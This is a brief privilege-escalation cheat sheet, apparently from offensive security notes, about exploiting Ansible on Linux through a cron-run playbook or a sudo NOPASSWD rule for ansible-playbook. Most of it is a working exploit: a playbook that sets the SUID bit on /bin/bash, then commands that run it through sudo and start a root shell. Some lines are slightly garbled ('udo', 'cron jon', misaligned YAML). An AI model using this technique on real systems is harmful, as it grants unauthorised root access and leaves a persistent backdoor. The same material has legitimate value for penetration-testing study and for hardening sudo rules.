Exploiting Ansible Service on Linux

 

 

Abusing ansible-playbook run.yml file

#consider ansible-playbook is running as a cron jon 
/usr/bin/ansible-playbook /opt/backups/playbook/run.yml
 

Abusing (ALL) NOPASSWD: /usr/bin/ansible-playbook *


Create a new get_root.yml file 

- hosts: localhost  
  tasks:  
  - name: test  
   command: "chmod +s /bin/bash"  


udo ansible-playbook get_root.yml  
/bin/bash -p